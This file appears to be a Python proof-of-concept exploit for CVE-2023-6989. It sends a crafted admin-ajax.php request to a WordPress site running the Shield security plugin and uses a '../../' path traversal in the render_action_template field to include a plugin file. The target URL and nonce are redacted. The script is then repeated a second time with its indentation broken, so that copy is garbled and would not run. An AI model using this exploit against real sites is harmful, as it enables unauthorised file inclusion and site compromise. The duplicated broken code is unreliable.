hatunaa/CVE-2023-6989.py

## CVE-2023-6989.py
import requests

url = 'https://redacted/wordpress/wp-admin/admin-ajax.php'
data = {
    'action': 'shield_action',
    'ex': 'generic_render',
    'exnonce': '{redacted_exnonce}',
    'render_action_template': '../../icwp-wpsf.php'
}

response = requests.post(url, data=data)

if response.status_code != 200:
    print(f"Request failed with status code: {response.status_code}")
else:
    print(response.text)
	import requests

	url = 'https://redacted/wordpress/wp-admin/admin-ajax.php'
	data = {
	'action': 'shield_action',
	'ex': 'generic_render',
	'exnonce': '{redacted_exnonce}',
	'render_action_template': '../../icwp-wpsf.php'
	}

	response = requests.post(url, data=data)

	if response.status_code != 200:
	print(f"Request failed with status code: {response.status_code}")
	else:
	print(response.text)